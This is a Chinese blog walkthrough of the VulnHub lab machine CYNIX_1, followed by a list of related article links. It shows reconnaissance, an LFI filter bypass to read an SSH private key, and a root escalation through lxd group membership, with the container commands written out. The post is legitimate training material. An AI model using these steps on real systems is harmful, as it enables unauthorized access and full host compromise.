Vulnhub靶机随笔-CYNIX_1

最新推荐文章于 2024-07-08 22:09:55 发布
置顶 最新推荐文章于 2024-07-08 22:09:55 发布
阅读量1.5k 收藏 42
点赞数 35
分类专栏: VulnHub 文章标签: linux web安全 网络安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59005129/article/details/138583844
版权

Vulnhub靶机CYNIX_1详解

攻击机Kali    IP:192.168.3.44

靶机       IP:未知   系统:未知

A.信息收集

扫描靶机存活性 确定IP地址

1.命令:arp-scan -l

扫描靶机开放端口及其服务版本信息

2.命令 nmap -A -p- -sV 靶机IP地址

3.靶机开放两个端口:    80web网站, 6688ssh端口 按照惯例先访问网站搜集信息,同时爆破子目录名

4.网站主目录就是apache的主目录,没有可利用价值

5.网站子目录爆破 dirb和dirsearch常规工具字典都跑不出有用目录,尝试暴力工具gobuster,外加字典/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 万事俱备,爆破!

选项解析:

              -u          目标URL

              -w          字典

              -x           要搜索的文件扩展名

6.得到一个隐藏子目录lavalamp,直接访问

页面就长这样:

7.挨个翻阅点击之后,找到一个可疑点

当问提交之后,上方会多出一个空白处

8.这可不是我画出来的,学过html的同学一眼就能看出这里面暗藏玄机,没学过的同学也没事,看下一张图片

9.中间存在一个按钮,并且可以提交

B.Burpsuit 流量截取

1.首先挂上代理 开启监听 然后重新提交一份表单 将截取到的流量发送到repeater模块

2.在repeater模块下,点击send发送,然后在render加载一下网页,如果加载不出,可以修改一下设置,将下列选项勾选上即可

3.我们copy一下URL,打开开发者模式(F12),在网页瞎点点,果真在先生的头部存在一个按钮,只不过被设置了透明,我们将其显现出来:将框框里的参数改为1.0即可

4.开启监听,随便输入并提交,这里看到参数是file,感觉很有可能存在LIF漏洞

5.好像被过滤掉了,既然他不仁也不能怪我们不义,直接绕过,最简单的当然是上fuzz字典去爆破,我这里是误打误撞,碰到了a就被我绕过了O.o

绕过!

6.得到一个可登录用户ford,还记得靶机开放了另一个端口6688吗,正是ssh端口,开连!

7.上图表示 靶机关闭了密码登录,所以我们或许需要一个私钥

补充一下:私钥一般和公钥在一起,理论上都放在用户的家目录中

那么…你懂的

8.copy上面的私钥,通过私钥进行ssh连接

这里别忘了给私钥赋予合理的权限,不然不让连哈哈

9.获取第一个flag

C. 提权

1.这里就不卖不关子了,一开始我尝试常见的提权姿势我没发现什么可用的地方,可能是我眼神不太好,所以我觉得直接跑工具稳妥  LinEnum.sh

链接:https://github.com/rebootuser/LinEnum

2.把LinEnum.sh的当前目录利用python发布出去,靶机下载LinEnum.sh脚本,赋予执行权限,然后就开跑

我说我眼神不好,没意见吧,了解lxc,lxd,docker容器的,可能会更明白一点

做个简短的补充:

LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。

总结来说,LXD是基于LXC的系统级容器管理器,提供了更高级别的接口和管理工具;LXC是Linux内核提供的一种虚拟化技术,允许在单个Linux内核上运行多个隔离的用户空间实例;而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。

Lxd提权原理:

LXD 是基于 LXC 容器的管理程序,当前用户可操作容器。所以用户可创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。

LXD 提权条件: 已经获得 shell  用户属于 lxd 组

3.查看镜像列表

命令:lxc image list

4.按照实际情况来说,需要创建一个特权镜像,但往往会失败,所以这里选择在kali生成镜像,然后复制到靶机上面

先在kali上面下载alpine

命令:git clone GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD

接着生成镜像,如下:

将图中框框的复制到靶机中

5.导入镜像.并对其重命名为hacker 哈哈明目张胆

命令: lxc image import alpine-v3.19-x86_64-20240507_0744.tar.gz --alias hacker

6.创建容器

命令: lxc init hacker hacker -c security.privileged=true

7.将容器hacker 挂载到/mnt/root下

命令: lxc config device add fromkali fromkali disk source=/ path=/mnt/root recursive=true

8.启动容器hacker!

命令: lxc start hacker

9.与主机交互!

命令: lxc exec hacker /bin/sh

10.豪取flag

但使龙城飞将在

不教胡马度阴山

好了,到这我们的文章真的结束了,有不懂的可以私信我

你们的点赞和关注是我更新的动力,让我们一起努力~~

不会PWN不改名
关注
  • 35
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Linux】进程间通信——匿名管道
最新发布
2201_76024104的博客
07-08 695
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
linux/shell】linux如何去除字符串中空格
qq_35902025的博客
07-06 288
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
Linux:系统安全及应用
pangdongqiqi的博客
07-01 1268
通过su命令可以非常方便地切换为另一个用户,但前提条件是必须知道目标用户的登 录密码。例如,若要从zhangsan 用户切换为 root 用户,必须知道 root 用户的密码。对于生产环 境中的 Linux 服务器,每多一个人知道特权密码,其安全风险也就增加一分。有没有一种折中的办法,既可以让普通用户拥有一部分管理权限,又不需要将 root 用户的密码告诉他呢?答案是肯定的,使用 sudo命令就可以提升执行权限。
Linux 系统安全加固:深入 SELinux 与 AppArmor
weixin_39372311的博客
07-08 523
SELinux 和 AppArmor 是两款强大的 Linux 安全模块,它们可以帮助你加固 Linux 系统安全,防止未经授权的访问和恶意行为。通过学习它们的原理、配置和使用方法,你可以更好地保护 Linux 系统安全,确保其稳定运行。
nginx安装(win和linux
f552126506的博客
07-07 425
nginx安装(win和linux
Linux系列2】Cmake安装记录
kewaqi618的博客
07-08 638
主要介绍Cmake的安装方法,及自己安装的过程
Linux存储管理I
m0_54563444的博客
07-03 804
主要知识点: 基本分区、逻辑卷LVM、EXT3/4/XFS文件系统、RAID。
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文
a15735748145a的博客
07-06 591
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;
Linux:进程间通信(一.初识进程间通信、匿名管道与命名管道、共享内存)
qq_74415153的博客
07-05 844
1.认识进程间通信 2.管道 2.1匿名管道 2.2pipe()函数 一创建匿名管道 2.3匿名管道的四种情况 2.4管道的特征 3.基于管道的进程池设计 4.命名管道 4.1引入与性质 4.2命令行创建 4.3程序中创建命名管道 写个小项目 项目规划 Cnmm.hpp PipeClient.cpp PipeServe.cpp 5.System V共享内存 5.1相关函数介绍
Linux x86_64平台指令替换函数 text_poke_smp/bp
小立仔
07-05 724
Linux x86_64平台指令替换函数 text_poke_smp/bp简介
Linux workqueue介绍
l00102795的博客
07-08 466
不是所有的驱动程序都必须有自己的工作队列。驱动程序可以使用内核提供的缺省工作队列。由于这个工作队列由很多驱动程序共享,任务可能会需要比较长一段时间才能开始执行。为了解决这一问题,工作函数中的延迟应该保持最小或者不要延时。
Linux--V4L2摄像头驱动框架及UVC浅析
qq_47258284的博客
07-04 945
对于一个usb摄像头,它的内核驱动源码位于/drivers/media/usb/uvc/核心层:V4L2_dev.c文件硬件相关层: uvc_driver.c文件本篇记录基于对6.8.8.8内核下vivid-core.c文件(虚拟视频驱动程序)的分析,梳理Linux系统中vedio视频设备的驱动框架。
Linux】目录的相关命令——cd,pwd,mkdir,rmdir
2301_80224556的博客
07-08 701
此外,由于很多的软件所使用的目录名称都相同,例如/usr/local/etc和/etc,但是通常Linux仅列出最后面那一个目录而已,这个时候你就可以使用pwd 来知道你的所在目录,免得搞错目录,造成损失。
Linux 常用指令详解
TheJustice_的博客
07-03 514
Linux 是一个强大而灵活的操作系统,掌握常用的 Linux 指令是使用和管理 Linux 系统的基础。本文将介绍一些常用的 Linux 指令,并附上 Vim 和 g++ 的常用指令说明,帮助你更好地进行开发和操作。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值